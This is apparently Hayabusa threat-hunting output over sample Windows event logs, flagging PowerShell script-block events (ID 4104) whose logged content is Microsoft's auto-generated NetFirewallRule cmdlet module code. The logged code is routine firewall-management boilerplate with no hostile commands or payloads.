[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType';,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent 
= $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetFirewallRule' -Alias '*' function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, 
$script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else {",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetFirewallRule' -Alias '*' function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetFirewallRule' -Alias '*' function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, 
[Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 